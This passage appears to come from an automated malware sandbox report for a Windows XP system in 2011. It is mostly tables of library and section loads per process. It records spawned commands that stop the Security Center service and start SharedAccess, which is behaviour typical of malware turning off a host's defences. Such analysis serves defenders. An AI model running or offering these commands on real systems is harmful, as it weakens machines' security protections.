\KnownDlls\comctl32.dll	write and read and execute	image	5D090000	630784	own pid	read write	success or wait	1
C:\WINDOWS\system32\comctl32.dll	read	commit	8B0000	618496	own pid	readonly	success or wait	1

Section loaded by program
File Path	Access	Type	Base	Size	Mapped to pid	Protection	Completion	Count	Source Address
C:\WINDOWS\system32\netmsg.dll	query and write and read and execute	image	71B40000	180224	own pid	read write	success or wait	1	10132A7

Thread Activities:

Thread delayed
TID	Delay	Completion	Count	Source Address
278	2s	success or wait	1	100B07D

Chronological sections
Operation	Data	Completion	Time
Section loaded	Path: \KnownDlls\kernel32.dll Access: write and read and execute Type: image Baseaddress: 7C800000 Size: 1007616 Protection: read write Mapped to pid: own pid	success or wait	1617326103
Section loaded	Path: \NLS\NlsSectionUnicode Access: read Type: image Baseaddress: 1B0000 Size: 90112 Protection: readonly Mapped to pid: own pid	success or wait	1617439352
Section loaded	Path: \NLS\NlsSectionLocale Access: read Type: image Baseaddress: 1D0000 Size: 266240 Protection: readonly Mapped to pid: own pid	success or wait	1617443372
Section loaded	Path: \NLS\NlsSectionSortkey Access: query and read Type: image Baseaddress: 220000 Size: 266240 Protection: readonly Mapped to pid: own pid	success or wait	1617488340
Section loaded	Path: \NLS\NlsSectionSortTbls Access: read Type: image Baseaddress: 270000 Size: 24576 Protection: readonly Mapped to pid: own pid	success or wait	1617502456
Section loaded	Path: \KnownDlls\msvcrt.dll Access: write and read and execute Type: image Baseaddress: 77C10000 Size: 360448 Protection: read write Mapped to pid: own pid	success or wait	1617596632
Section loaded	Path: \KnownDlls\ADVAPI32.dll Access: write and read and execute Type: image Baseaddress: 77DD0000 Size: 634880 Protection: read write Mapped to pid: own pid	success or wait	1617726948
Section loaded	Path: \KnownDlls\RPCRT4.dll Access: write and read and execute Type: image Baseaddress: 77E70000 Size: 602112 Protection: read write Mapped to pid: own pid	success or wait	1617770280
Section loaded	Path: \KnownDlls\Secur32.dll Access: write and read and execute Type: image Baseaddress: 77FE0000 Size: 69632 Protection: read write Mapped to pid: own pid	success or wait	1617809670
Section loaded	Path: C:\WINDOWS\system32\netapi32.dll Access: query and write and read and execute Type: image Baseaddress: 5B860000 Size: 348160 Protection: read write Mapped to pid: own pid	success or wait	1617942676
Section loaded	Path: C:\WINDOWS\system32\samlib.dll Access: query and write and read and execute Type: image Baseaddress: 71BF0000 Size: 77824 Protection: read write Mapped to pid: own pid	success or wait	1618031346
Section loaded	Path: \KnownDlls\USER32.dll Access: write and read and execute Type: image Baseaddress: 7E410000 Size: 593920 Protection: read write Mapped to pid: own pid	success or wait	1618052629
Section loaded	Path: \KnownDlls\GDI32.dll Access: write and read and execute Type: image Baseaddress: 77F10000 Size: 299008 Protection: read write Mapped to pid: own pid	success or wait	1618055650
Section loaded	Path: C:\WINDOWS\system32\ntdsapi.dll Access: query and write and read and execute Type: image Baseaddress: 767A0000 Size: 77824 Protection: read write Mapped to pid: own pid	success or wait	1618138890
Section loaded	Path: C:\WINDOWS\system32\dnsapi.dll Access: query and write and read and execute Type: image Baseaddress: 76F20000 Size: 159744 Protection: read write Mapped to pid: own pid	success or wait	1618151318
Section loaded	Path: C:\WINDOWS\system32\ws2_32.dll Access: query and write and read and execute Type: image Baseaddress: 71AB0000 Size: 94208 Protection: read write Mapped to pid: own pid	success or wait	1618223671
Section loaded	Path: C:\WINDOWS\system32\ws2help.dll Access: query and write and read and execute Type: image Baseaddress: 71AA0000 Size: 32768 Protection: read write Mapped to pid: own pid	success or wait	1618274891
Section loaded	Path: \KnownDlls\WLDAP32.dll Access: write and read and execute Type: image Baseaddress: 76F60000 Size: 180224 Protection: read write Mapped to pid: own pid	success or wait	1618418724
Section loaded	Path: C:\WINDOWS\system32\netrap.dll Access: query and write and read and execute Type: image Baseaddress: 71C80000 Size: 28672 Protection: read write Mapped to pid: own pid	success or wait	1618520899
Section loaded	Path: C:\WINDOWS\system32\shimeng.dll Access: query and write and read and execute Type: image Baseaddress: 5CB70000 Size: 155648 Protection: read write Mapped to pid: own pid	success or wait	1618565610
Section loaded	Path: C:\WINDOWS\AppPatch\sysmain.sdb Access: read Type: commit Baseaddress: 280000 Size: 1208320 Protection: readonly Mapped to pid: own pid	success or wait	1618597647
Section loaded	Path: C:\WINDOWS\AppPatch\acgenral.dll Access: write and read and execute Type: commit Baseaddress: 3C0000 Size: 1855488 Protection: execute Mapped to pid: own pid	success or wait	1618641413
Section loaded	Path: C:\WINDOWS\AppPatch\acgenral.dll Access: write and read and execute Type: commit Baseaddress: 3C0000 Size: 1855488 Protection: execute Mapped to pid: own pid	success or wait	1618644842
Section loaded	Path: C:\WINDOWS\AppPatch\acgenral.dll Access: query and write and read and execute Type: image Baseaddress: 6F880000 Size: 1875968 Protection: read write Mapped to pid: own pid	success or wait	1618667343
Section loaded	Path: C:\WINDOWS\system32\winmm.dll Access: query and write and read and execute Type: image Baseaddress: 76B40000 Size: 184320 Protection: read write Mapped to pid: own pid	success or wait	1618698380
Section loaded	Path: \KnownDlls\ole32.dll Access: write and read and execute Type: image Baseaddress: 774E0000 Size: 1302528 Protection: read write Mapped to pid: own pid	success or wait	1618710836
Section loaded	Path: \KnownDlls\OLEAUT32.dll Access: write and read and execute Type: image Baseaddress: 77120000 Size: 569344 Protection: read write Mapped to pid: own pid	success or wait	1618757674
Section loaded	Path: C:\WINDOWS\system32\msacm32.dll Access: query and write and read and execute Type: image Baseaddress: 77BE0000 Size: 86016 Protection: read write Mapped to pid: own pid	success or wait	1618770268
Section loaded	Path: \KnownDlls\VERSION.dll Access: write and read and execute Type: image Baseaddress: 77C00000 Size: 32768 Protection: read write Mapped to pid: own pid	success or wait	1618779138
Section loaded	Path: \KnownDlls\SHELL32.dll Access: write and read and execute Type: image Baseaddress: 7C9C0000 Size: 8482816 Protection: read write Mapped to pid: own pid	success or wait	1618783128
Section loaded	Path: \KnownDlls\SHLWAPI.dll Access: write and read and execute Type: image Baseaddress: 77F60000 Size: 483328 Protection: read write Mapped to pid: own pid	success or wait	1618855184
Section loaded	Path: \KnownDlls\USERENV.dll Access: write and read and execute Type: image Baseaddress: 769C0000 Size: 737280 Protection: read write Mapped to pid: own pid	success or wait	1618886428
Section loaded	Path: C:\WINDOWS\system32\uxtheme.dll Access: query and write and read and execute Type: image Baseaddress: 5AD70000 Size: 229376 Protection: read write Mapped to pid: own pid	success or wait	1618975057
Section loaded	Path: \NLS\NlsSectionCType Access: read Type: image Baseaddress: 3D0000 Size: 12288 Protection: readonly Mapped to pid: own pid	success or wait	1619051704
Section loaded	Path: C:\WINDOWS\system32\imm32.dll Access: write and read and execute Type: commit Baseaddress: 350000 Size: 110592 Protection: execute Mapped to pid: own pid	success or wait	1619157779
Section loaded	Path: C:\WINDOWS\system32\imm32.dll Access: write and read and execute Type: commit Baseaddress: 350000 Size: 110592 Protection: execute Mapped to pid: own pid	success or wait	1619168911
Section loaded	Path: C:\WINDOWS\system32\imm32.dll Access: query and write and read and execute Type: image Baseaddress: 76390000 Size: 118784 Protection: read write Mapped to pid: own pid	success or wait	1619170511
Section loaded	Path: C:\WINDOWS\system32\shell32.dll Access: read Type: commit Baseaddress: 1030000 Size: 8462336 Protection: readonly Mapped to pid: own pid	success or wait	1622232027
Section loaded	Path: C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.6028_x-ww_61e65202\comctl32.dll Access: write and read and execute Type: commit Baseaddress: 8B0000 Size: 1056768 Protection: execute Mapped to pid: own pid	success or wait	1622304899
Section loaded	Path: C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.6028_x-ww_61e65202\comctl32.dll Access: query and write and read and execute Type: image Baseaddress: 773D0000 Size: 1060864 Protection: read write Mapped to pid: own pid	success or wait	1622337543
Section loaded	Path: C:\WINDOWS\WindowsShell.Manifest Access: write and read and execute Type: commit Baseaddress: 380000 Size: 4096 Protection: execute Mapped to pid: own pid	success or wait	1622526420
Section loaded	Path: C:\WINDOWS\WindowsShell.Manifest Access: query and read Type: commit Baseaddress: 380000 Size: 4096 Protection: readonly Mapped to pid: own pid	success or wait	1622560374
Section loaded	Path: C:\WINDOWS\WindowsShell.Manifest Access: query and read Type: commit Baseaddress: 380000 Size: 4096 Protection: readonly Mapped to pid: own pid	success or wait	1622567196
Section loaded	Path: \KnownDlls\comctl32.dll Access: write and read and execute Type: image Baseaddress: 5D090000 Size: 630784 Protection: read write Mapped to pid: own pid	success or wait	1622624890
Section loaded	Path: C:\WINDOWS\system32\comctl32.dll Access: read Type: commit Baseaddress: 8B0000 Size: 618496 Protection: readonly Mapped to pid: own pid	success or wait	1622938889
Section loaded	Path: C:\WINDOWS\system32\netmsg.dll Access: query and write and read and execute Type: image Baseaddress: 71B40000 Size: 180224 Protection: read write Mapped to pid: own pid	success or wait	1623648864
Thread delayed	Time: 2 TID: 278	success or wait	1623676739

Analysis File: net.exe PID: 1984 Parent PID: 1692

Sections

General
Start time:	07:41:20
Start date:	21/09/2011
Path:	C:\WINDOWS\system32\net.exe
Commandline:	net stop Security Center
Imagebase:	0x1000000
File size:	42496 bytes
MD5 hash:	FD3DA8425624B98903407DF608CF2C11

Section Activities:

Section loaded by Windows
File Path	Access	Type	Base	Size	Mapped to pid	Protection	Completion	Count
\KnownDlls\kernel32.dll	write and read and execute	image	7C800000	1007616	own pid	read write	success or wait	1
\NLS\NlsSectionUnicode	read	image	1B0000	90112	own pid	readonly	success or wait	1
\NLS\NlsSectionLocale	read	image	1D0000	266240	own pid	readonly	success or wait	1
\NLS\NlsSectionSortkey	query and read	image	220000	266240	own pid	readonly	success or wait	1
\NLS\NlsSectionSortTbls	read	image	270000	24576	own pid	readonly	success or wait	1
\KnownDlls\msvcrt.dll	write and read and execute	image	77C10000	360448	own pid	read write	success or wait	1
\KnownDlls\ADVAPI32.dll	write and read and execute	image	77DD0000	634880	own pid	read write	success or wait	1
\KnownDlls\RPCRT4.dll	write and read and execute	image	77E70000	602112	own pid	read write	success or wait	1
\KnownDlls\Secur32.dll	write and read and execute	image	77FE0000	69632	own pid	read write	success or wait	1
C:\WINDOWS\system32\netapi32.dll	query and write and read and execute	image	5B860000	348160	own pid	read write	success or wait	1
\KnownDlls\MPR.dll	write and read and execute	image	71B20000	73728	own pid	read write	success or wait	1
\KnownDlls\USER32.dll	write and read and execute	image	7E410000	593920	own pid	read write	success or wait	1
\KnownDlls\GDI32.dll	write and read and execute	image	77F10000	299008	own pid	read write	success or wait	1
C:\WINDOWS\system32\shimeng.dll	query and write and read and execute	image	5CB70000	155648	own pid	read write	success or wait	1
C:\WINDOWS\AppPatch\sysmain.sdb	read	commit	280000	1208320	own pid	readonly	success or wait	1
C:\WINDOWS\AppPatch\acgenral.dll	write and read and execute	commit	3C0000	1855488	own pid	execute	success or wait	2
C:\WINDOWS\AppPatch\acgenral.dll	query and write and read and execute	image	6F880000	1875968	own pid	read write	success or wait	1
C:\WINDOWS\system32\winmm.dll	query and write and read and execute	image	76B40000	184320	own pid	read write	success or wait	1
\KnownDlls\ole32.dll	write and read and execute	image	774E0000	1302528	own pid	read write	success or wait	1
\KnownDlls\OLEAUT32.dll	write and read and execute	image	77120000	569344	own pid	read write	success or wait	1
C:\WINDOWS\system32\msacm32.dll	query and write and read and execute	image	77BE0000	86016	own pid	read write	success or wait	1
\KnownDlls\VERSION.dll	write and read and execute	image	77C00000	32768	own pid	read write	success or wait	1
\KnownDlls\SHELL32.dll	write and read and execute	image	7C9C0000	8482816	own pid	read write	success or wait	1
\KnownDlls\SHLWAPI.dll	write and read and execute	image	77F60000	483328	own pid	read write	success or wait	1
\KnownDlls\USERENV.dll	write and read and execute	image	769C0000	737280	own pid	read write	success or wait	1
C:\WINDOWS\system32\uxtheme.dll	query and write and read and execute	image	5AD70000	229376	own pid	read write	success or wait	1
\NLS\NlsSectionCType	read	image	3D0000	12288	own pid	readonly	success or wait	1
C:\WINDOWS\system32\imm32.dll	write and read and execute	commit	350000	110592	own pid	execute	success or wait	2
C:\WINDOWS\system32\imm32.dll	query and write and read and execute	image	76390000	118784	own pid	read write	success or wait	1
C:\WINDOWS\system32\shell32.dll	read	commit	1020000	8462336	own pid	readonly	success or wait	1
C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.6028_x-ww_61e65202\comctl32.dll	write and read and execute	commit	8B0000	1056768	own pid	execute	success or wait	1
C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.6028_x-ww_61e65202\comctl32.dll	query and write and read and execute	image	773D0000	1060864	own pid	read write	success or wait	1
C:\WINDOWS\WindowsShell.Manifest	write and read and execute	commit	380000	4096	own pid	execute	success or wait	1
C:\WINDOWS\WindowsShell.Manifest	query and read	commit	380000	4096	own pid	readonly	success or wait	2
\KnownDlls\comctl32.dll	write and read and execute	image	5D090000	630784	own pid	read write	success or wait	1
C:\WINDOWS\system32\comctl32.dll	read	commit	8B0000	618496	own pid	readonly	success or wait	1

Section loaded by program
File Path	Access	Type	Base	Size	Mapped to pid	Protection	Completion	Count	Source Address
\BaseNamedObjects\ShimSharedMemory	write	image	8B0000	57344	own pid	read write	success or wait	1	1001D71
C:\WINDOWS\system32\apphelp.dll	write and read and execute	commit	8C0000	126976	own pid	execute	success or wait	1	1001D71
C:\WINDOWS\system32\apphelp.dll	query and write and read and execute	image	77B40000	139264	own pid	read write	success or wait	1	1001D71
C:\WINDOWS\AppPatch\sysmain.sdb	read	commit	8C0000	1208320	own pid	readonly	success or wait	1	1001D71
C:\WINDOWS\system32\net1.exe	write and read and execute	commit	9F0000	126976	own pid	execute	success or wait	2	1001D71
C:\WINDOWS\system32\net1.exe	query and read	commit	9F0000	126976	own pid	readonly	success or wait	2	1001D71

Process Activities:

Process started
PID	Filepath	Cmdline	Flags	Completion	Count	Source Address
2348	C:\WINDOWS\system32\net1.exe	net1 stop Security Center	suspended	success or wait	1	1001D71

Chronological sections
Operation	Data	Completion	Time
Section loaded	Path: \KnownDlls\kernel32.dll Access: write and read and execute Type: image Baseaddress: 7C800000 Size: 1007616 Protection: read write Mapped to pid: own pid	success or wait	1621174413
Section loaded	Path: \NLS\NlsSectionUnicode Access: read Type: image Baseaddress: 1B0000 Size: 90112 Protection: readonly Mapped to pid: own pid	success or wait	1621413198
Section loaded	Path: \NLS\NlsSectionLocale Access: read Type: image Baseaddress: 1D0000 Size: 266240 Protection: readonly Mapped to pid: own pid	success or wait	1621436450
Section loaded	Path: \NLS\NlsSectionSortkey Access: query and read Type: image Baseaddress: 220000 Size: 266240 Protection: readonly Mapped to pid: own pid	success or wait	1621443079
Section loaded	Path: \NLS\NlsSectionSortTbls Access: read Type: image Baseaddress: 270000 Size: 24576 Protection: readonly Mapped to pid: own pid	success or wait	1621448222
Section loaded	Path: \KnownDlls\msvcrt.dll Access: write and read and execute Type: image Baseaddress: 77C10000 Size: 360448 Protection: read write Mapped to pid: own pid	success or wait	1621477190
Section loaded	Path: \KnownDlls\ADVAPI32.dll Access: write and read and execute Type: image Baseaddress: 77DD0000 Size: 634880 Protection: read write Mapped to pid: own pid	success or wait	1621603019
Section loaded	Path: \KnownDlls\RPCRT4.dll Access: write and read and execute Type: image Baseaddress: 77E70000 Size: 602112 Protection: read write Mapped to pid: own pid	success or wait	1621680660
Section loaded	Path: \KnownDlls\Secur32.dll Access: write and read and execute Type: image Baseaddress: 77FE0000 Size: 69632 Protection: read write Mapped to pid: own pid	success or wait	1621735497
Section loaded	Path: C:\WINDOWS\system32\netapi32.dll Access: query and write and read and execute Type: image Baseaddress: 5B860000 Size: 348160 Protection: read write Mapped to pid: own pid	success or wait	1621874543
Section loaded	Path: \KnownDlls\MPR.dll Access: write and read and execute Type: image Baseaddress: 71B20000 Size: 73728 Protection: read write Mapped to pid: own pid	success or wait	1621922412
Section loaded	Path: \KnownDlls\USER32.dll Access: write and read and execute Type: image Baseaddress: 7E410000 Size: 593920 Protection: read write Mapped to pid: own pid	success or wait	1622033348
Section loaded	Path: \KnownDlls\GDI32.dll Access: write and read and execute Type: image Baseaddress: 77F10000 Size: 299008 Protection: read write Mapped to pid: own pid	success or wait	1622068814
Section loaded	Path: C:\WINDOWS\system32\shimeng.dll Access: query and write and read and execute Type: image Baseaddress: 5CB70000 Size: 155648 Protection: read write Mapped to pid: own pid	success or wait	1622203200
Section loaded	Path: C:\WINDOWS\AppPatch\sysmain.sdb Access: read Type: commit Baseaddress: 280000 Size: 1208320 Protection: readonly Mapped to pid: own pid	success or wait	1622305144
Section loaded	Path: C:\WINDOWS\AppPatch\acgenral.dll Access: write and read and execute Type: commit Baseaddress: 3C0000 Size: 1855488 Protection: execute Mapped to pid: own pid	success or wait	1622472038
Section loaded	Path: C:\WINDOWS\AppPatch\acgenral.dll Access: write and read and execute Type: commit Baseaddress: 3C0000 Size: 1855488 Protection: execute Mapped to pid: own pid	success or wait	1622506033
Section loaded	Path: C:\WINDOWS\AppPatch\acgenral.dll Access: query and write and read and execute Type: image Baseaddress: 6F880000 Size: 1875968 Protection: read write Mapped to pid: own pid	success or wait	1622530741
Section loaded	Path: C:\WINDOWS\system32\winmm.dll Access: query and write and read and execute Type: image Baseaddress: 76B40000 Size: 184320 Protection: read write Mapped to pid: own pid	success or wait	1622645534
Section loaded	Path: \KnownDlls\ole32.dll Access: write and read and execute Type: image Baseaddress: 774E0000 Size: 1302528 Protection: read write Mapped to pid: own pid	success or wait	1622924013
Section loaded	Path: \KnownDlls\OLEAUT32.dll Access: write and read and execute Type: image Baseaddress: 77120000 Size: 569344 Protection: read write Mapped to pid: own pid	success or wait	1623041564
Section loaded	Path: C:\WINDOWS\system32\msacm32.dll Access: query and write and read and execute Type: image Baseaddress: 77BE0000 Size: 86016 Protection: read write Mapped to pid: own pid	success or wait	1623210014
Section loaded	Path: \KnownDlls\VERSION.dll Access: write and read and execute Type: image Baseaddress: 77C00000 Size: 32768 Protection: read write Mapped to pid: own pid	success or wait	1623520999
Section loaded	Path: \KnownDlls\SHELL32.dll Access: write and read and execute Type: image Baseaddress: 7C9C0000 Size: 8482816 Protection: read write Mapped to pid: own pid	success or wait	1623596441
Section loaded	Path: \KnownDlls\SHLWAPI.dll Access: write and read and execute Type: image Baseaddress: 77F60000 Size: 483328 Protection: read write Mapped to pid: own pid	success or wait	1623709297
Section loaded	Path: \KnownDlls\USERENV.dll Access: write and read and execute Type: image Baseaddress: 769C0000 Size: 737280 Protection: read write Mapped to pid: own pid	success or wait	1623787418
Section loaded	Path: C:\WINDOWS\system32\uxtheme.dll Access: query and write and read and execute Type: image Baseaddress: 5AD70000 Size: 229376 Protection: read write Mapped to pid: own pid	success or wait	1623880712
Section loaded	Path: \NLS\NlsSectionCType Access: read Type: image Baseaddress: 3D0000 Size: 12288 Protection: readonly Mapped to pid: own pid	success or wait	1623954097
Section loaded	Path: C:\WINDOWS\system32\imm32.dll Access: write and read and execute Type: commit Baseaddress: 350000 Size: 110592 Protection: execute Mapped to pid: own pid	success or wait	1624110897
Section loaded	Path: C:\WINDOWS\system32\imm32.dll Access: write and read and execute Type: commit Baseaddress: 350000 Size: 110592 Protection: execute Mapped to pid: own pid	success or wait	1624150835
Section loaded	Path: C:\WINDOWS\system32\imm32.dll Access: query and write and read and execute Type: image Baseaddress: 76390000 Size: 118784 Protection: read write Mapped to pid: own pid	success or wait	1624178066
Section loaded	Path: C:\WINDOWS\system32\shell32.dll Access: read Type: commit Baseaddress: 1020000 Size: 8462336 Protection: readonly Mapped to pid: own pid	success or wait	1625245147
Section loaded	Path: C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.6028_x-ww_61e65202\comctl32.dll Access: write and read and execute Type: commit Baseaddress: 8B0000 Size: 1056768 Protection: execute Mapped to pid: own pid	success or wait	1625333226
Section loaded	Path: C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.6028_x-ww_61e65202\comctl32.dll Access: query and write and read and execute Type: image Baseaddress: 773D0000 Size: 1060864 Protection: read write Mapped to pid: own pid	success or wait	1625366967
Section loaded	Path: C:\WINDOWS\WindowsShell.Manifest Access: write and read and execute Type: commit Baseaddress: 380000 Size: 4096 Protection: execute Mapped to pid: own pid	success or wait	1625589573
Section loaded	Path: C:\WINDOWS\WindowsShell.Manifest Access: query and read Type: commit Baseaddress: 380000 Size: 4096 Protection: readonly Mapped to pid: own pid	success or wait	1625591761
Section loaded	Path: C:\WINDOWS\WindowsShell.Manifest Access: query and read Type: commit Baseaddress: 380000 Size: 4096 Protection: readonly Mapped to pid: own pid	success or wait	1625614538
Section loaded	Path: \KnownDlls\comctl32.dll Access: write and read and execute Type: image Baseaddress: 5D090000 Size: 630784 Protection: read write Mapped to pid: own pid	success or wait	1625647264
Section loaded	Path: C:\WINDOWS\system32\comctl32.dll Access: read Type: commit Baseaddress: 8B0000 Size: 618496 Protection: readonly Mapped to pid: own pid	success or wait	1626036302
Section loaded	Path: \BaseNamedObjects\ShimSharedMemory Access: write Type: image Baseaddress: 8B0000 Size: 57344 Protection: read write Mapped to pid: own pid	success or wait	1626476564
Section loaded	Path: C:\WINDOWS\system32\apphelp.dll Access: write and read and execute Type: commit Baseaddress: 8C0000 Size: 126976 Protection: execute Mapped to pid: own pid	success or wait	1626479774
Section loaded	Path: C:\WINDOWS\system32\apphelp.dll Access: query and write and read and execute Type: image Baseaddress: 77B40000 Size: 139264 Protection: read write Mapped to pid: own pid	success or wait	1626538424
Section loaded	Path: C:\WINDOWS\AppPatch\sysmain.sdb Access: read Type: commit Baseaddress: 8C0000 Size: 1208320 Protection: readonly Mapped to pid: own pid	success or wait	1626566059
Section loaded	Path: C:\WINDOWS\system32\net1.exe Access: write and read and execute Type: commit Baseaddress: 9F0000 Size: 126976 Protection: execute Mapped to pid: own pid	success or wait	1626665418
Section loaded	Path: C:\WINDOWS\system32\net1.exe Access: query and read Type: commit Baseaddress: 9F0000 Size: 126976 Protection: readonly Mapped to pid: own pid	success or wait	1626667676
Section loaded	Path: C:\WINDOWS\system32\net1.exe Access: write and read and execute Type: commit Baseaddress: 9F0000 Size: 126976 Protection: execute Mapped to pid: own pid	success or wait	1626704897
Section loaded	Path: C:\WINDOWS\system32\net1.exe Access: query and read Type: commit Baseaddress: 9F0000 Size: 126976 Protection: readonly Mapped to pid: own pid	success or wait	1626706778
Process created	PID: 2348 Path: C:\WINDOWS\system32\net1.exe Cmdline: net1 stop Security Center Createflags: suspended	success or wait	1626752869

Analysis File: net.exe PID: 1928 Parent PID: 444

Sections

General
Start time:	07:41:20
Start date:	21/09/2011
Path:	C:\WINDOWS\system32\net.exe
Commandline:	net start SharedAccess
Imagebase:	0x1000000
File size:	42496 bytes
MD5 hash:	FD3DA8425624B98903407DF608CF2C11

Section Activities:

Section loaded by Windows
File Path	Access	Type	Base	Size	Mapped to pid	Protection	Completion	Count
\KnownDlls\kernel32.dll	write and read and execute	image	7C800000	1007616	own pid	read write	success or wait	1
\NLS\NlsSectionUnicode	read	image	1B0000	90112	own pid	readonly	success or wait	1
\NLS\NlsSectionLocale	read	image	1D0000	266240	own pid	readonly	success or wait	1
\NLS\NlsSectionSortkey	query and read	image	220000	266240	own pid	readonly	success or wait	1
\NLS\NlsSectionSortTbls	read	image	270000	24576	own pid	readonly	success or wait	1
\KnownDlls\msvcrt.dll	write and read and execute	image	77C10000	360448	own pid	read write	success or wait	1
\KnownDlls\ADVAPI32.dll	write and read and execute	image	77DD0000	634880	own pid	read write	success or wait	1
\KnownDlls\RPCRT4.dll	write and read and execute	image	77E70000	602112	own pid	read write	success or wait	1
\KnownDlls\Secur32.dll	write and read and execute	image	77FE0000	69632	own pid	read write	success or wait	1
C:\WINDOWS\system32\netapi32.dll	query and write and read and execute	image	5B860000	348160	own pid	read write	success or wait	1
\KnownDlls\MPR.dll	write and read and execute	image	71B20000	73728	own pid	read write	success or wait	1
\KnownDlls\USER32.dll	write and read and execute	image	7E410000	593920	own pid	read write	success or wait	1
\KnownDlls\GDI32.dll	write and read and execute	image	77F10000	299008	own pid	read write	success or wait	1
C:\WINDOWS\system32\shimeng.dll	query and write and read and execute	image	5CB70000	155648	own pid	read write	success or wait	1
C:\WINDOWS\AppPatch\sysmain.sdb	read	commit	280000	1208320	own pid	readonly	success or wait	1
C:\WINDOWS\AppPatch\acgenral.dll	write and read and execute	commit	3C0000	1855488	own pid	execute	success or wait	2
C:\WINDOWS\AppPatch\acgenral.dll	query and write and read and execute	image	6F880000	1875968	own pid	read write	success or wait	1
C:\WINDOWS\system32\winmm.dll	query and write and read and execute	image	76B40000	184320	own pid	read write	success or wait	1
\KnownDlls\ole32.dll	write and read and execute	image	774E0000	1302528	own pid	read write	success or wait	1
\KnownDlls\OLEAUT32.dll	write and read and execute	image	77120000	569344	own pid	read write	success or wait	1
C:\WINDOWS\system32\msacm32.dll	query and write and read and execute	image	77BE0000	86016	own pid	read write	success or wait	1
\KnownDlls\VERSION.dll	write and read and execute	image	77C00000	32768	own pid	read write	success or wait	1
\KnownDlls\SHELL32.dll	write and read and execute	image	7C9C0000	8482816	own pid	read write	success or wait	1
\KnownDlls\SHLWAPI.dll	write and read and execute	image	77F60000	483328	own pid	read write	success or wait	1
\KnownDlls\USERENV.dll	write and read and execute	image	769C0000	737280	own pid	read write	success or wait	1
C:\WINDOWS\system32\uxtheme.dll	query and write and read and execute	image	5AD70000	229376	own pid	read write	success or wait	1
\NLS\NlsSectionCType	read	image	3D0000	12288	own pid	readonly	success or wait	1
C:\WINDOWS\system32\imm32.dll	write and read and execute	commit	350000	110592	own pid	execute	success or wait	2
C:\WINDOWS\system32\imm32.dll	query and write and read and execute	image	76390000	118784	own pid	read write	success or wait	1
C:\WINDOWS\system32\shell32.dll	read	commit	1020000	8462336	own pid	readonly	success or wait	1
C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.6028_x-ww_61e65202\comctl32.dll	write and read and execute	commit	8B0000	1056768	own pid	execute	success or wait	1
C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.6028_x-ww_61e65202\comctl32.dll	query and write and read and execute	image	773D0000	1060864	own pid	read write	success or wait	1
C:\WINDOWS\WindowsShell.Manifest	write and read and execute	commit	380000	4096	own pid	execute	success or wait	1
C:\WINDOWS\WindowsShell.Manifest	query and read	commit	380000	4096	own pid	readonly	success or wait	2
\KnownDlls\comctl32.dll	write and read and execute	image	5D090000	630784	own pid	read write	success or wait	1
C:\WINDOWS\system32\comctl32.dll	read	commit	8B0000	618496	own pid	readonly	success or wait	1

Section loaded by program
File Path	Access	Type	Base	Size	Mapped to pid	Protection	Completion	Count	Source Address
\BaseNamedObjects\ShimSharedMemory	write	image	8B0000	57344	own pid	read write	success or wait	1	1001D71
C:\WINDOWS\system32\apphelp.dll	write and read and execute	commit	8C0000	126976	own pid	execute	success or wait	1	1001D71
C:\WINDOWS\system32\apphelp.dll	query and write and read and execute	image	77B40000	139264	own pid	read write	success or wait	1	1001D71
C:\WINDOWS\AppPatch\sysmain.sdb	read	commit	8C0000	1208320	own pid	readonly	success or wait	1	1001D71
C:\WINDOWS\system32\net1.exe	write and read and execute	commit	9F0000	126976	own pid	execute	success or wait	2	1001D71
C:\WINDOWS\system32\net1.exe	query and read	commit	9F0000	126976	own pid	readonly	success or wait	2	1001D71

Process Activities:

Process started
PID	Filepath	Cmdline	Flags	Completion	Count	Source Address
2328	C:\WINDOWS\system32\net1.exe	net1 start SharedAccess	suspended	success or wait	1	1001D71

Chronological sections
Operation	Data	Completion	Time
Section loaded	Path: \KnownDlls\kernel32.dll Access: write and read and execute Type: image Baseaddress: 7C800000 Size: 1007616 Protection: read write Mapped to pid: own pid	success or wait	1621166025
Section loaded	Path: \NLS\NlsSectionUnicode Access: read Type: image Baseaddress: 1B0000 Size: 90112 Protection: readonly Mapped to pid: own pid	success or wait	1621372018
Section loaded	Path: \NLS\NlsSectionLocale Access: read Type: image Baseaddress: 1D0000 Size: 266240 Protection: readonly Mapped to pid: own pid	success or wait	1621411345
Section loaded	Path: \NLS\NlsSectionSortkey Access: query and read Type: image Baseaddress: 220000 Size: 266240 Protection: readonly Mapped to pid: own pid	success or wait	1621436717
Section loaded	Path: \NLS\NlsSectionSortTbls Access: read Type: image Baseaddress: 270000 Size: 24576 Protection: readonly Mapped to pid: own pid	success or wait	1621443314
Section loaded	Path: \KnownDlls\msvcrt.dll Access: write and read and execute Type: image Baseaddress: 77C10000 Size: 360448 Protection: read write Mapped to pid: own pid	success or wait	1621456505
Section loaded	Path: \KnownDlls\ADVAPI32.dll Access: write and read and execute Type: image Baseaddress: 77DD0000 Size: 634880 Protection: read write Mapped to pid: own pid	success or wait	1621508187
Section loaded	Path: \KnownDlls\RPCRT4.dll Access: write and read and execute Type: image Baseaddress: 77E70000 Size: 602112 Protection: read write Mapped to pid: own pid	success or wait	1621656812
Section loaded	Path: \KnownDlls\Secur32.dll Access: write and read and execute Type: image Baseaddress: 77FE0000 Size: 69632 Protection: read write Mapped to pid: own pid	success or wait	1621704873
Section loaded	Path: C:\WINDOWS\system32\netapi32.dll Access: query and write and read and execute Type: image Baseaddress: 5B860000 Size: 348160 Protection: read write Mapped to pid: own pid	success or wait	1621786577
Section loaded	Path: \KnownDlls\MPR.dll Access: write and read and execute Type: image Baseaddress: 71B20000 Size: 73728 Protection: read write Mapped to pid: own pid	success or wait	1621892551
Section loaded	Path: \KnownDlls\USER32.dll Access: write and read and execute Type: image Baseaddress: 7E410000 Size: 593920 Protection: read write Mapped to pid: own pid	success or wait	1621948512
